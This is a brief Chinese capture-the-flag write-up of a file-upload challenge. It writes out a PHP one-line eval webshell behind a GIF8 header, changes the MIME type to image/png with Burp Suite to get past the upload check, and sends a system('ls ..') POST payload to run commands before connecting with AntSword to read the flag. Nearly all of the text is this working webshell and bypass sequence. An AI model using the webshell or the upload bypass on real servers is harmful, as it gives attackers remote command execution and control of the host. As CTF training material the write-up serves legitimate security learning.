先尝试上传一句话,后端会提示文件类型不正确:

    1.png

    我们来编写一句话木马,命名为shell.php

    1. GIF8
    2. <?php @eval($_POST['banana']);?>

    我们用 Burpsuite 拦截请求,修改 MIME 类型为image/png,放行:

    2.png

    然后题目显示上传成功:

    3.png

    我们访问 WebShell 的地址,用 Hackbar 发送 POST 命令:

    1. banana=system('ls ..');

    4.png

    我们用蚁剑连接 WebShell(哥斯拉连不上图片马):

    5.png

    进入主机,发现 Flag 文件在/var/www/html/目录下:

    6.png

    打开即可得到 Flag:

    7.png